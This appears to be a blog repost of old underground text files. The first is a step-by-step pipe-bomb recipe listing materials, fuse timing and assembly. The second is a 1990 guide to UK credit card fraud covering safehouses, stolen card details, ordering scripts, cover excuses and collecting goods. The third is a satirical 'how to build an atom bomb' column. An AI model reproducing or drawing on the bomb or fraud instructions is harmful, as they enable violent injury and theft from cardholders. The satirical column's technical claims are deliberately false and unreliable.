Hand Grenades can be made from a piece of iron pipe. The filler can be of plastic or granular military explosive, improvised explosive, or propellant from shotgun or small arms munition.
Material Required: -----------------
Iron Pipe, threaded ends, 1-1/2" to 3" diameter, 3" to 8" long. Two (2) iron pipe caps Explosive or propellant Nonelectric blasting cap (Commercial or military) Fuse cord Hand Drill Pliers
Procedure: ---------
1) Place blasting cap on one end of fuse cord and crimp with pliers.
NOTE: To find out how long the fuse cord should be, check the time it takes a known length to burn. If 12 inches burns in 30 seconds, a 6 inch cord will ignite the grenade in 15 seconds.
2) Screw pipe cap to one end of the pipe. Place fuse cord with blasting cap into the opposite end so that the blasting cap is near the center of the pipe.
NOTE: If plastic explosive is to be used, fill pipe BEFORE inserting blasting cap. Push a round stick into the center of the explosive to make a hole and then insert the blasting cap.
3) Pour explosive or propellant into pipe a little bit at a time.
Tap the base of the pipe frequently to settle filler.
4) Drill a hole in the center of the unassembled pipe caplarge enough for the fuse cord to pass through.
5) Wipe pipe threads to remove any filler material. Slide the drilled pipe cap over the fuse and screw handtight onto the pipe.
Ready to go!
--------------Jolly Roger
U.K. CREDIT CARD FRAUD - 22/10/90 - Written by CREDITMAN
U.K. credit card fraud is a lot easier than over in the States. Thesame basic 3 essentials are needed -
1...A safehouse. 2...Credit card numbers with Xp date and address. 3...Good suppliers of next day delivery goods.
1...The SafehouseThe safehouse should be on the ground floor, so as not to piss offthe delivery man when he comes to drop off your freshly stolen gear.If he has to go up 10 flights in a complete dive and some 14 year oldkid signs for an A2000 then he's gonna wonder! Make sure there are nonosey neighbours, a good area is one full of yuppies 'cos they all goto work during daytime. Safehouses are usually obtained by paying amonth's rent in advance or putting down a deposit of say, ð ð200.Either that or break into a place and use that.
2...Credit Card Numbers.The card number, expiry date, start date (if possible), full name(including middle inital), phone number and full address with postcodeare ideal. If you can only get the sirname, and no postcode, youshouldn't have any real hassle. Just say you moved recently to yournew address. Phone number is handy, if it just rings and rings but ifit doesn't, then make sure it's ex-directory. You CANNOT get awaywith giving them a bullshit phone number. Some fussy companies wantphone numbers just to cross-check on CARDNET but generally it's notneeded. To recap, here's a quick check-list...
1.Card number and Xpiry date. 2.Name and address of card holder. 3.First name/initials (OPTIONAL) 4.Start date (OPTIONAL) 5.Postcode (OPTIONAL) 6.Phone number (OPTIONAL)
If you have all 6, then you shouldn't have any hassle. Start date isthe rarest item you could be asked for, postcode and initals beingmore common. If you are missing 3-6 then you need one helluva smooth-talking bastard on the phone line!!!!
3...The OrderingNot everyone can order ð ð1000's of stuff - it's not easy. You have to
be cool, smooth and have some good answers to their questions. Iadvise that you only order up to ð ð500 worth of stuff in one go, but ifyou have details 1-6 and the phone number will NOT be answered from 9-5.30 P.M. then go up to ð ð1000 (make sure it's a GOLD card!). Whengetting ready to order make sure you have at least 3 times the amountof suppliers you need e.g.if you want to card 5 hard-drives, make sureyou have 15 suppliers. A lot of the time, they are either out stock,can't do next day delivery or won't deliver to a different address.Quick check list of what you must ask before handing over number -
1.Next day delivery, OK? 2.Ordered to different address to card, OK? 3.Do you have item in stock (pretty obvious, eh?)
Make sure you ask ALL of these questions before handing over yourprecious number.
Excuses...Usual excuses for a different address are that it's a present oryou're on business here for the next 5 weeks etc. Any old bullshitwhy it won't go to the proper address.
WARNING!*******Invoices!*******WARNING!Invoices are sometimes sent out with the actual parcel but they arealso sent out to the card owners (why do you think they need theaddress for?) so using a safehouse for more than 2 days is risky. A 1day shot is safe, if they catch on then they'll stop the goods beforegetting a search warrant.
Credit Limits...Limits on cards reach from ð ð500 to ð ð4000 on Gold cards. Your averagecard will be about ð ð1000-ð ð1500. It takes a while to build up a good
credit rating in order to have large limits so don't think every cardwill hold 12 IBM 386's! Visa and Access are always used - AmericanXpress etc. are USELESS.
Access = Eurocard, Mastercard (begins with 5) Visa = (begins with 4, 16 digit is a Gold)
A general rule is, always confirm an order to make sure credit iscleared. As the month goes on, credit is used up - the bad times arefrom 27th - 3rd which is when all the bills come in. Best time tocard is around 11th or 12th, when the poor guy has paid off his lastbill so you can run up a new one (he, he, he!).
Ideal items to card...
The best stuff is always computer hard-ware as it's next-day. Amigas,ST's, PC's - anything really. Blank discs are a waste of time,they're too heavy. Xternal drives, monitors - good stuff basically.Don't order any shit like VCR's, hi-fi, video-cameras, musickeyboards, computer software, jewerely or anything under ð ð300. You'llfind the listed items are difficult to get next day delivery andusually won't deliver to a different address - bastards, eh? You'rewasting your time with little items under ð ð300, try to keep deliveriesunder 10 a day.
The drop....Two ways of doing the drop
1.Sign for all the gear (make sure you're there between 9.00 and5.30 P.M.)
2.Don't turn up till around 6.30 P.M. and collect all the cardsthat the delivery man has left. These usually say 'you were out at XXtime so could you please arrange new time for delivery or pick upfrom our depot'. In that case, piss off to the depot and get all thegear (need a big car!).
Remember, carding is ILLEGAL kiddies, so don't get caught.ñ œ
=======================================================================
How To Build An Atom BombThe following paper is taken from The Journal of Irreproducible Results, Volume 25/Number 4/1979. P.O. Box 234 Chicago Heights, Illinois 60411
INTRODUCTION Worldwide controversy has been generated recently from several court decisions in the United States which have restricted popular magazines from printing articles which describe how to make an atomic bomb. The reason usually given by the courts is that national security would be compromised if such information were generally available. But, since it is commonly known that all of the information is publicly available in most major metropolitan libraries, obviously the court's officially stated position is covering up a more important factor; namely, that such atomic devices would prove too difficult for the average citizen to construct. The United States courts cannot afford to insult the vast majorities by insinuating that they do not have the intelligence of a cabbage, and thus the "official" press releases claim national security as a blanket restriction.
The rumors that have unfortunately occurred as a result of widespread misinformation can (and must) be cleared up now, for the construction project this month is the construction of a thermonuclear device, which will hopefully clear up any misconceptions you might have about such a project. We will see how easy it is to make a device of your very own in ten easy steps, to have and hold as you see fit, without annoying interference from the government or the courts.
The project will cost between $5,000 and $30,000, depending on how fancy you want the final product to be. Since last week's column, "Let's Make a Time Machine", was received so well in the new step-by-step format, this month's column will follow the same format.
CONSTRUCTION METHOD First, obtain about 50 pounds (110 kg) of weapons grade Plutonium at your local supplier (see NOTE 1). A nuclear power plant is not recommended, as large quantities of missing Plutonium tends to make plant engineers unhappy. We suggest that you contact your local terrorist organization, or perhaps the Junior Achievement in your neighborhood. Please remember that Plutonium, especially pure, refined Plutonium, is somewhat dangerous. Wash your hands with soap and warm water after handling the material, and don't allow your children or pets to play in it or eat it. Any left over Plutonium dust is excellent as an insect repellant. You may wish to keep the substance in a lead box if you can find one in your local junk yard, but an old coffee can will do nicely. Fashion together a metal enclosure to house the device. Most common varieties of sheet metal can be bent to disguise this enclosure as, for example, a briefcase, a lunch pail, or a Buick. Do not use tinfoil. Arrange the Plutonium into two hemispheral shapes, separated by about 4 cm. Use rubber cement to hold the Plutonium dust together. Now get about 100 pounds (220 kg) of trinitrotoluene (TNT). Gelignite is much better, but messier to work with. Your helpful hardware man will be happy to provide you with this item. Pack the TNT around the hemisphere arrangement constructed in step 4. If you cannot find Gelignite, fell free to use TNT packed in with Playdo or any modeling clay. Colored clay is acceptable, but there is no need to get fancy at this point. Enclose the structure from step 6 into the enclosure made in step 3. Use a strong glue such as "Crazy Glue" to bind the hemisphere arrangement against the enclosure to prevent accidental detonation which might result from vibration or mishandling. To detonate the device, obtain a radio controlled (RC) servo mechanism, as found in RC model airplanes and cars. With a modicum of effort, a remote plunger can be made that will strike a detonator cap to effect a small explosion. These detonatior caps can be found in the electrical supply section of your local supermarket. We recommend the "Blast-O-Mactic" brand because they are no deposit-no return. Now hide the completed device from the neighbors and children. The garage is not recommended because of high humidity and the extreme range of temperatures experienced there. Nuclear devices have been known to spontaneously detonate in these unstable conditions. The hall closet or under the kitchen sink will be perfectly suitable. Now you are the proud owner of a working thermonuclear device! It is a great ice-breaker at parties, and in a pinch, can be used for national defense. THEORY OF OPERATION The device basically works when the detonated TNT compresses the Plutonium into a critical mass. The critical mass then produces a nuclear chain recation similar to the domino chain reaction (discussed in this column, "Dominos on the March", March, 1968). The chain reaction then promptly produces a big thermonuclear reaction. And there you have it, a 10 megaton explosion!
NEXT MONTH'S COLUMN In next month's column, we will learn how to clone your neighbor's wife in six easy steps. This project promises to be an exciting weekend full of fun and profit. Common kitchen utensils will be all you need. See you next month!
NOTES 1. Plutonium (PU), atomic number 94, is a radioactive metallic element formed by the decay of Neptunium and is similar in chemical structure to Uranium, Saturium, Jupiternium, and Marisum.
PREVIOUS MONTH'S COLUMNS Let's Make Test Tube Babies! May, 1979 Let's Make a Solar System! June, 1979 Let's Make an Economic Recession! July, 1979 Let's Make an Anti-Gravity Machine! August, 1979 Let's Make Contact with an Alien Race! September, 1979

No comments: